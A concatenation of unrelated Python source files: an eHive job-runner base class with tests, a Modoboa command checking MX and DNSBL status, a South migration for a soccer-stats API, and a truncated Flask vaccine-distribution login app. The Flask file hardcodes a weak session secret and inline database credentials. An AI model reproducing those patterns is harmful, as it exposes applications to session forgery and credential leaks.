# Copyright [1999-2015] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
# Copyright [2016-2021] EMBL-European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module mainly implements python's counterpart of GuestProcess. Read
the later for more information about the JSON protocol used to communicate.
"""
import json
import os
import sys
import traceback
import unittest
import warnings
from . import params
__version__ = "5.0"
class Job:
"""Dummy class to hold job-related information"""
pass
class CompleteEarlyException(Exception):
"""Can be raised by a derived class of BaseRunnable to indicate an early successful termination"""
pass
class JobFailedException(Exception):
"""Can be raised by a derived class of BaseRunnable to indicate an early unsuccessful termination"""
pass
class HiveJSONMessageException(Exception):
"""Raised when we could not parse the JSON message coming from GuestProcess"""
pass
class LostHiveConnectionException(Exception):
"""Raised when the process has lost the communication pipe with the Perl side"""
pass
class BaseRunnable:
"""This is the counterpart of GuestProcess. Note that most of the methods
are private to be hidden in the derived classes.
This class can be used as a base-class for people to redefine fetch_input(),
run() and/or write_output() (and/or pre_cleanup(), post_cleanup()).
Jobs are supposed to raise CompleteEarlyException in case they complete before
reaching. They can also raise JobFailedException to indicate a general failure
"""
# Private BaseRunnable interface
#################################
def __init__(self, read_fileno, write_fileno, debug):
# We need the binary mode to disable the buffering
self.__read_pipe = os.fdopen(read_fileno, mode='rb', buffering=0)
self.__write_pipe = os.fdopen(write_fileno, mode='wb', buffering=0)
self.__pid = os.getpid()
self.debug = debug
self.__process_life_cycle()
def __print_debug(self, *args):
if self.debug > 1:
print("PYTHON {0}".format(self.__pid), *args, file=sys.stderr)
# FIXME: we can probably merge __send_message and __send_response
def __send_message(self, event, content):
"""seralizes the message in JSON and send it to the parent process"""
def default_json_encoder(o):
self.__print_debug("Cannot serialize {0} (type {1}) in JSON".format(o, type(o)))
return 'UNSERIALIZABLE OBJECT'
j = json.dumps({'event': event, 'content': content}, indent=None, default=default_json_encoder)
self.__print_debug('__send_message:', j)
# UTF8 encoding has never been tested. Just hope it works :)
try:
self.__write_pipe.write(bytes(j+"\n", 'utf-8'))
except BrokenPipeError:
raise LostHiveConnectionException("__write_pipe") from None
def __send_response(self, response):
"""Sends a response message to the parent process"""
self.__print_debug('__send_response:', response)
# Like above, UTF8 encoding has never been tested. Just hope it works :)
try:
self.__write_pipe.write(bytes('{"response": "' + str(response) + '"}\n', 'utf-8'))
except BrokenPipeError:
raise LostHiveConnectionException("__write_pipe") from None
def __read_message(self):
"""Read a message from the parent and parse it"""
try:
self.__print_debug("__read_message ...")
l = self.__read_pipe.readline()
self.__print_debug(" ... -> ", l[:-1].decode())
return json.loads(l.decode())
except BrokenPipeError:
raise LostHiveConnectionException("__read_pipe") from None
except ValueError as e:
# HiveJSONMessageException is a more meaningful name than ValueError
raise HiveJSONMessageException from e
def __send_message_and_wait_for_OK(self, event, content):
"""Send a message and expects a response to be 'OK'"""
self.__send_message(event, content)
response = self.__read_message()
if response['response'] != 'OK':
raise HiveJSONMessageException("Received '{0}' instead of OK".format(response))
def __process_life_cycle(self):
"""Simple loop: wait for job parameters, do the job's life-cycle"""
self.__send_message_and_wait_for_OK('VERSION', __version__)
self.__send_message_and_wait_for_OK('PARAM_DEFAULTS', self.param_defaults())
self.__created_worker_temp_directory = None
while True:
self.__print_debug("waiting for instructions")
config = self.__read_message()
if 'input_job' not in config:
self.__print_debug("no params, this is the end of the wrapper")
return
self.__job_life_cycle(config)
def __job_life_cycle(self, config):
"""Job's life-cycle. See GuestProcess for a description of the protocol to communicate with the parent"""
self.__print_debug("__life_cycle")
# Parameters
self.__params = params.ParamContainer(config['input_job']['parameters'], self.debug > 1)
# Job attributes
self.input_job = Job()
for x in ['dbID', 'input_id', 'retry_count']:
setattr(self.input_job, x, config['input_job'][x])
self.input_job.autoflow = True
self.input_job.lethal_for_worker = False
self.input_job.transient_error = True
# Worker attributes
self.debug = config['debug']
# Which methods should be run
steps = [ 'fetch_input', 'run' ]
if self.input_job.retry_count > 0:
steps.insert(0, 'pre_cleanup')
if config['execute_writes']:
steps.append('write_output')
steps.append('post_healthcheck')
self.__print_debug("steps to run:", steps)
self.__send_response('OK')
# The actual life-cycle
died_somewhere = False
try:
for s in steps:
self.__run_method_if_exists(s)
except CompleteEarlyException as e:
self.warning(e.args[0] if len(e.args) else repr(e), False)
except LostHiveConnectionException as e:
# Mothing we can do, let's just exit
raise
except Exception as e:
died_somewhere = True
self.warning( self.__traceback(e, 2), True)
try:
self.__run_method_if_exists('post_cleanup')
except LostHiveConnectionException as e:
# Mothing we can do, let's just exit
raise
except Exception as e:
died_somewhere = True
self.warning( self.__traceback(e, 2), True)
job_end_structure = {'complete' : not died_somewhere, 'job': {}, 'params': {'substituted': self.__params.param_hash, 'unsubstituted': self.__params.unsubstituted_param_hash}}
for x in [ 'autoflow', 'lethal_for_worker', 'transient_error' ]:
job_end_structure['job'][x] = getattr(self.input_job, x)
self.__send_message_and_wait_for_OK('JOB_END', job_end_structure)
def __run_method_if_exists(self, method):
"""method is one of "pre_cleanup", "fetch_input", "run", "write_output", "post_cleanup".
We only the call the method if it exists to save a trip to the database."""
if hasattr(self, method):
self.__send_message_and_wait_for_OK('JOB_STATUS_UPDATE', method)
getattr(self, method)()
def __traceback(self, exception, skipped_traces):
"""Remove "skipped_traces" lines from the stack trace (the eHive part)"""
s1 = traceback.format_exception_only(type(exception), exception)
l = traceback.extract_tb(exception.__traceback__)[skipped_traces:]
s2 = traceback.format_list(l)
return "".join(s1+s2)
# Public BaseRunnable interface
################################
def warning(self, message, is_error = False):
"""Store a message in the log_message table with is_error indicating whether the warning is actually an error or not"""
self.__send_message_and_wait_for_OK('WARNING', {'message': message, 'is_error': is_error})
def dataflow(self, output_ids, branch_name_or_code = 1):
"""Dataflows the output_id(s) on a given branch (default 1). Returns whatever the Perl side returns"""
if branch_name_or_code == 1:
self.input_job.autoflow = False
self.__send_message('DATAFLOW', {'output_ids': output_ids, 'branch_name_or_code': branch_name_or_code, 'params': {'substituted': self.__params.param_hash, 'unsubstituted': self.__params.unsubstituted_param_hash}})
return self.__read_message()['response']
def worker_temp_directory(self):
"""Returns the full path of the temporary directory created by the worker.
"""
if self.__created_worker_temp_directory is None:
self.__send_message('WORKER_TEMP_DIRECTORY', None)
self.__created_worker_temp_directory = self.__read_message()['response']
return self.__created_worker_temp_directory
# Param interface
##################
def param_defaults(self):
"""Returns the defaults parameters for this runnable"""
return {}
def param_required(self, param_name):
"""Returns the value of the parameter "param_name" or raises an exception
if anything wrong happens or the value is None. The exception is
marked as non-transient."""
t = self.input_job.transient_error
self.input_job.transient_error = False
v = self.__params.get_param(param_name)
if v is None:
raise params.NullParamException(param_name)
self.input_job.transient_error = t
return v
def param(self, param_name, *args):
"""When called as a setter: sets the value of the parameter "param_name".
When called as a getter: returns the value of the parameter "param_name".
It does not raise an exception if the parameter (or another one in the
substitution stack) is undefined"""
# As a setter
if len(args):
return self.__params.set_param(param_name, args[0])
# As a getter
try:
return self.__params.get_param(param_name)
except KeyError as e:
warnings.warn("parameter '{0}' cannot be initialized because {1} is missing !".format(param_name, e), params.ParamWarning, 2)
return None
def param_exists(self, param_name):
"""Returns True if the parameter exists and can be successfully
substituted, None if the substitution fails, False if it is missing"""
if not self.__params.has_param(param_name):
return False
try:
self.__params.get_param(param_name)
return True
except KeyError:
return None
def param_is_defined(self, param_name):
"""Returns True if the parameter exists and can be successfully
substituted to a defined value, None if the substitution fails,
False if it is missing or evaluates as None"""
e = self.param_exists(param_name)
if not e:
# False or None
return e
try:
return self.__params.get_param(param_name) is not None
except KeyError:
return False
class BaseRunnableTestCase(unittest.TestCase):
def test_job_param(self):
class FakeRunnableWithParams(BaseRunnable):
def __init__(self, d):
self._BaseRunnable__params = params.ParamContainer(d)
self.input_job = Job()
self.input_job.transient_error = True
j = FakeRunnableWithParams({
'a': 3,
'b': None,
'c': '#other#',
'e': '#e#'
})
# param_exists
self.assertIs( j.param_exists('a'), True, '"a" exists' )
self.assertIs( j.param_exists('b'), True, '"b" exists' )
self.assertIs( j.param_exists('c'), None, '"c"\'s existence is unclear' )
self.assertIs( j.param_exists('d'), False, '"d" doesn\'t exist' )
with self.assertRaises(params.ParamInfiniteLoopException):
j.param_exists('e')
# param_is_defined
self.assertIs( j.param_is_defined('a'), True, '"a" is defined' )
self.assertIs( j.param_is_defined('b'), False, '"b" is not defined' )
self.assertIs( j.param_is_defined('c'), None, '"c"\'s defined-ness is unclear' )
self.assertIs( j.param_is_defined('d'), False, '"d" is not defined (it doesn\'t exist)' )
with self.assertRaises(params.ParamInfiniteLoopException):
j.param_is_defined('e')
# param
self.assertIs( j.param('a'), 3, '"a" is 3' )
self.assertIs( j.param('b'), None, '"b" is None' )
with self.assertWarns(params.ParamWarning):
self.assertIs( j.param('c'), None, '"c"\'s value is unclear' )
with self.assertWarns(params.ParamWarning):
self.assertIs( j.param('d'), None, '"d" is not defined (it doesn\'t exist)' )
with self.assertRaises(params.ParamInfiniteLoopException):
j.param('e')
# param_required
self.assertIs( j.param_required('a'), 3, '"a" is 3' )
with self.assertRaises(params.NullParamException):
j.param_required('b')
with self.assertRaises(KeyError):
j.param_required('c')
with self.assertRaises(KeyError):
j.param_required('d')
with self.assertRaises(params.ParamInfiniteLoopException):
j.param_required('e')
|
<gh_stars>0
"""Management command to check defined domains."""
from datetime import datetime
from datetime import timedelta
import ipaddress
import dns.resolver
import gevent
from gevent import socket
from django.conf import settings
from django.core.management.base import BaseCommand
from django.template.loader import render_to_string
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _
from django.utils import timezone
from modoboa.admin import constants
from modoboa.admin import models
from modoboa.lib import email_utils
from modoboa.parameters import tools as param_tools
class CheckMXRecords(BaseCommand):
"""Command class."""
help = "Check defined domains."
@cached_property
def providers(self):
"""Return a list of DNSBL providers."""
if not hasattr(settings, "DNSBL_PROVIDERS"):
return constants.DNSBL_PROVIDERS
return settings.DNSBL_PROVIDERS
@cached_property
def sender(self):
"""Return sender address for notifications."""
return param_tools.get_global_parameter("sender_address", app="core")
@cached_property
def valid_mxs(self):
"""Return valid MXs set in admin."""
valid_mxs = param_tools.get_global_parameter("valid_mxs")
return [ipaddress.ip_network(u"{}".format(v.strip()))
for v in valid_mxs.split() if v.strip()]
def add_arguments(self, parser):
"""Add extra arguments to command."""
parser.add_argument(
"--no-dnsbl", action="store_true", default=False,
help="Skip DNSBL queries.")
parser.add_argument(
"--email", type=str, action="append", default=[],
help="One or more email to notify")
parser.add_argument(
"--skip-admin-emails", action="store_true",
default=False,
help="Skip domain's admins email notification.")
parser.add_argument(
"--domain", type=str, action="append", default=[],
help="Domain name or id to update.")
parser.add_argument(
"--timeout", type=int, default=3,
help="Timeout used for queries.")
parser.add_argument(
"--ttl", type=int, default=7200,
help="TTL for dns query.")
def get_mx_records_for_domain(self, domain, ttl=7200):
"""Return one or more `models.MXRecord` for `domain`.
DNS queries are not performed while `ttl` (in seconds) is still valid.
"""
now = timezone.now()
records = models.MXRecord.objects.filter(domain=domain,
updated__gt=now)
if records.exists():
for record in records:
yield record
raise StopIteration()
models.MXRecord.objects.filter(domain=domain).delete()
try:
answers = dns.resolver.query(domain.name, "MX")
except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN,
dns.resolver.NoNameservers):
raise StopIteration()
delta = timedelta(seconds=ttl)
for answer in answers:
try:
# work if .exchange is a name or IP
address = socket.gethostbyname(str(answer.exchange))
except socket.gaierror:
pass
else:
try:
# we must have a valid IP
address = ipaddress.ip_address(u"{}".format(address))
except ValueError:
pass
else:
record = models.MXRecord.objects.create(
domain=domain,
name=u"{}".format(str(answer.exchange).strip(".")),
address=u"{}".format(address),
updated=now + delta)
yield record
def query_dnsbl(self, mx_list, provider):
"""Check given IP against given DNSBL provider."""
results = {}
for mx in mx_list:
reverse = ".".join(reversed(mx.address.split(".")))
pattern = "{}.{}.".format(reverse, provider)
try:
results[mx] = socket.gethostbyname(pattern)
except socket.gaierror:
results[mx] = False
return provider, results
def store_dnsbl_result(self, domain, provider, results, **options):
"""Store DNSBL provider results for domain."""
alerts = {}
to_create = []
for mx in results.keys():
result = "" if not results[mx] else results[mx]
dnsbl_result = models.DNSBLResult.objects.filter(
domain=domain, provider=provider, mx=mx).first()
if dnsbl_result is None:
to_create.append(
models.DNSBLResult(
domain=domain, provider=provider, mx=mx,
status=result)
)
else:
if not dnsbl_result.status and result:
if domain not in alerts:
alerts[domain] = []
alerts[domain].append((provider, mx))
dnsbl_result.status = result
dnsbl_result.save()
models.DNSBLResult.objects.bulk_create(to_create)
if not alerts:
return
emails = options["email"]
if not options["skip_admin_emails"]:
emails.extend(
domain.admins.exclude(email="").values_list("email", flat=True)
)
if not len(emails):
return
content = render_to_string(
"admin/notifications/domain_in_dnsbl.html", {
"domain": domain, "alerts": alerts
})
subject = _("[modoboa] DNSBL issue(s) for domain {}").format(
domain.name)
for email in emails:
status, msg = email_utils.sendmail_simple(
self.sender, email,
subject=subject, content=content)
if not status:
print(msg)
def check_valid_mx(self, domain, mx_list, **options):
"""Check that domain's MX record exist.
If `valid_mx` is provided, retrieved MX records must be
contained in it.
"""
alerts = []
check = False
mxs = [(mx, ipaddress.ip_address(u"%s" % mx.address))
for mx in mx_list]
valid_mxs = self.valid_mxs
if not mxs:
alerts.append(_("Domain {} has no MX record").format(domain))
elif valid_mxs:
for subnet in valid_mxs:
for mx, addr in mxs:
if addr in subnet:
mx.managed = check = True
mx.save()
if check is False:
mx_names = [
"{0.name} ({0.address})".format(mx) for mx in mx_list]
alerts.append(
_("MX record for domain {0} is invalid: {1}").format(
domain, ", ".join(mx_names))
)
if not alerts:
return
emails = options["email"]
if not options["skip_admin_emails"]:
emails.extend(
domain.admins.exclude(email="").values_list("email", flat=True)
)
if not len(emails):
return
content = render_to_string(
"admin/notifications/domain_invalid_mx.html", {
"domain": domain, "alerts": alerts
})
subject = _("[modoboa] MX issue(s) for domain {}").format(
domain.name)
for email in emails:
status, msg = email_utils.sendmail_simple(
self.sender, email,
subject=subject, content=content)
if not status:
print(msg)
def check_domain(self, domain, timeout=3, ttl=7200, **options):
"""Check specified domain."""
mx_list = list(self.get_mx_records_for_domain(domain, ttl=ttl))
if param_tools.get_global_parameter("enable_mx_checks"):
self.check_valid_mx(domain, mx_list, **options)
condition = (
not param_tools.get_global_parameter("enable_dnsbl_checks") or
options["no_dnsbl"] is True)
if condition or not mx_list:
return
jobs = [
gevent.spawn(self.query_dnsbl, mx_list, provider)
for provider in self.providers]
gevent.joinall(jobs, timeout)
for job in jobs:
if not job.successful():
continue
provider, results = job.value
self.store_dnsbl_result(domain, provider, results, **options)
def handle(self, *args, **options):
"""Command entry point."""
# Remove deprecated records first
models.DNSBLResult.objects.exclude(
provider__in=self.providers).delete()
if options["domain"]:
domains = []
for domain in options["domain"]:
try:
if domain.isdigit():
domains.append(models.Domain.objects.get(pk=domain))
else:
domains.append(models.Domain.objects.get(name=domain))
except models.Domain.DoesNotExist:
pass
else:
domains = models.Domain.objects.filter(
enabled=True, enable_dns_checks=True)
options.pop("domain")
for domain in domains:
if domain.uses_a_reserved_tld:
continue
self.check_domain(domain, **options)
|
<filename>mls_api/migrations/0001_initial.py
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Team'
db.create_table(u'mls_api_team', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=50)),
))
db.send_create_signal(u'mls_api', ['Team'])
# Adding model 'Player'
db.create_table(u'mls_api_player', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('first_name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('last_name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('number', self.gf('django.db.models.fields.IntegerField')()),
('team', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Team'])),
('position', self.gf('django.db.models.fields.CharField')(max_length=32)),
))
db.send_create_signal(u'mls_api', ['Player'])
# Adding model 'GamePlayer'
db.create_table(u'mls_api_gameplayer', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('player', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Player'])),
('position', self.gf('django.db.models.fields.CharField')(max_length=32)),
('game', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Game'])),
('captain', self.gf('django.db.models.fields.BooleanField')(default=False)),
('team', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Team'])),
))
db.send_create_signal(u'mls_api', ['GamePlayer'])
# Adding model 'Competition'
db.create_table(u'mls_api_competition', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=50)),
('year', self.gf('django.db.models.fields.CharField')(max_length=4)),
))
db.send_create_signal(u'mls_api', ['Competition'])
# Adding model 'Game'
db.create_table(u'mls_api_game', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('home_team', self.gf('django.db.models.fields.related.ForeignKey')(related_name='home_team', to=orm['mls_api.Team'])),
('away_team', self.gf('django.db.models.fields.related.ForeignKey')(related_name='away_team', to=orm['mls_api.Team'])),
('start_time', self.gf('django.db.models.fields.DateTimeField')()),
('home_score', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('away_score', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('competition', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Competition'])),
('stat_link', self.gf('django.db.models.fields.CharField')(max_length=512)),
))
db.send_create_signal(u'mls_api', ['Game'])
# Adding model 'Substitution'
db.create_table(u'mls_api_substitution', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('out_player', self.gf('django.db.models.fields.related.ForeignKey')(related_name='subbed_out', to=orm['mls_api.Player'])),
('in_player', self.gf('django.db.models.fields.related.ForeignKey')(related_name='subbed_in', to=orm['mls_api.Player'])),
('team', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Team'])),
('minute', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'mls_api', ['Substitution'])
# Adding model 'Goal'
db.create_table(u'mls_api_goal', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('minute', self.gf('django.db.models.fields.IntegerField')()),
('player', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.GamePlayer'])),
('penalty', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'mls_api', ['Goal'])
# Adding M2M table for field assisted_by on 'Goal'
db.create_table(u'mls_api_goal_assisted_by', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('goal', models.ForeignKey(orm[u'mls_api.goal'], null=False)),
('gameplayer', models.ForeignKey(orm[u'mls_api.gameplayer'], null=False))
))
db.create_unique(u'mls_api_goal_assisted_by', ['goal_id', 'gameplayer_id'])
# Adding model 'Booking'
db.create_table(u'mls_api_booking', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('minute', self.gf('django.db.models.fields.IntegerField')()),
('player', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Player'])),
('card_color', self.gf('django.db.models.fields.CharField')(max_length=8)),
))
db.send_create_signal(u'mls_api', ['Booking'])
def backwards(self, orm):
# Deleting model 'Team'
db.delete_table(u'mls_api_team')
# Deleting model 'Player'
db.delete_table(u'mls_api_player')
# Deleting model 'GamePlayer'
db.delete_table(u'mls_api_gameplayer')
# Deleting model 'Competition'
db.delete_table(u'mls_api_competition')
# Deleting model 'Game'
db.delete_table(u'mls_api_game')
# Deleting model 'Substitution'
db.delete_table(u'mls_api_substitution')
# Deleting model 'Goal'
db.delete_table(u'mls_api_goal')
# Removing M2M table for field assisted_by on 'Goal'
db.delete_table('mls_api_goal_assisted_by')
# Deleting model 'Booking'
db.delete_table(u'mls_api_booking')
models = {
u'mls_api.booking': {
'Meta': {'object_name': 'Booking'},
'card_color': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'minute': ('django.db.models.fields.IntegerField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'player': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Player']"})
},
u'mls_api.competition': {
'Meta': {'object_name': 'Competition'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '4'})
},
u'mls_api.game': {
'Meta': {'object_name': 'Game'},
'away_score': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'away_team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'away_team'", 'to': u"orm['mls_api.Team']"}),
'competition': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Competition']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'home_score': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'home_team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'home_team'", 'to': u"orm['mls_api.Team']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'players': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['mls_api.Player']", 'through': u"orm['mls_api.GamePlayer']", 'symmetrical': 'False'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {}),
'stat_link': ('django.db.models.fields.CharField', [], {'max_length': '512'})
},
u'mls_api.gameplayer': {
'Meta': {'object_name': 'GamePlayer'},
'captain': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Game']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'player': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Player']"}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Team']"})
},
u'mls_api.goal': {
'Meta': {'object_name': 'Goal'},
'assisted_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'assists'", 'symmetrical': 'False', 'to': u"orm['mls_api.GamePlayer']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'minute': ('django.db.models.fields.IntegerField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'penalty': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'player': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.GamePlayer']"})
},
u'mls_api.player': {
'Meta': {'object_name': 'Player'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.IntegerField', [], {}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Team']"})
},
u'mls_api.substitution': {
'Meta': {'object_name': 'Substitution'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_player': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subbed_in'", 'to': u"orm['mls_api.Player']"}),
'minute': ('django.db.models.fields.IntegerField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'out_player': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subbed_out'", 'to': u"orm['mls_api.Player']"}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Team']"})
},
u'mls_api.team': {
'Meta': {'object_name': 'Team'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
}
}
complete_apps = ['mls_api'] |
<reponame>vcoeto/Google-Cloud-API-Vaccines
import redis
from flask import Flask, jsonify, request, redirect, render_template, url_for, session, redirect
import pymongo
from pymongo import MongoClient
import json
from bson import json_util
from bson.objectid import ObjectId
from flask_pymongo import PyMongo
#Hash de password
import bcrypt
import os
host_info = "redis-16819.c124.us-central1-1.gce.cloud.redislabs.com"
r = redis.Redis(host=host_info, port=16819, password='<PASSWORD>')
app = Flask(__name__)
app.config["MONGO_URI"]="mongodb+srv://Jorge:<EMAIL>YxUlFA17JUOb@<EMAIL>.net/ProyectoFinal?retryWrites=true&w=majority"
mongo = PyMongo(app)
## pa victor
app.secret_key='secretivekey'
############## main.py for mongo
##############################################################
#Front-end login
#All the routing in our app will be mentioned here
#Proyecto final que se encuentra en el URI connect
###Gobierno###
#Default route gobierno
@app.route('/')
def index():
if 'username' in session:
#Lleva al usaro al url /home
return redirect(url_for('home'))
return render_template('index.html')
#/home url, muestra a register_reparto.html
@app.route('/home')
def home():
return 'You are logged in as '+session['username']+render_template('register_reparto.html')
#When you press login gobierno
@app.route('/login',methods=['POST'])
def login():
users=mongo.db.Gobierno
login_user = users.find_one({'Username': request.form['username']})
#If the user exists
if login_user:
#Compare the encripted password
if bcrypt.hashpw(request.form['pass'].encode('utf-8'),login_user['Password'].encode('utf-8'))== login_user['Password'].encode('utf-8'):
session['username']=request.form['username']
r.setex("prueba", 120, request.form['username'])
return redirect(url_for('index'))
return 'Er'
return 'Invalid username/password combination'
#Register
#When you press register gobierno
@app.route('/register', methods=['POST','GET'])
def register():
if request.method=='POST':
#Check if it is registered already
users = mongo.db.Gobierno
#The 'username appears in the register.html. Pass username and look in database for name
#'Username' referse to the name column in databae, may need to change that
existing_user = users.find_one({'Username':request.form['username']})
#Check if the user does not exist and register it
if existing_user is None:
#Hash the password
hashpass = bcrypt.hashpw(request.form['pass'].encode('utf-8'), bcrypt.gensalt())
#Insert in name username, and password the hash password
#Since the password is hashed, it becomes a byte object, we need to transform it to string, therefore we decode it
users.insert({'Municipio': request.form['municipio'], 'Username':request.form['username'], 'Password': <PASSWORD>('utf-8'),'Vacunas_Disp': 0, 'Vacunas_utl': 0})
session['username']=request.form['username']
r.setex("prueba", 120, request.form['username'])
return redirect(url_for('index'))
#Existing user was not none
return 'That username already exists!'
return render_template('register.html')
###FinalGobierno###
###Hospitales###
#Ruta default del hospital,
@app.route('/hospital')
def index_hospital():
if 'username' in session:
return redirect(url_for('home_hospital'))
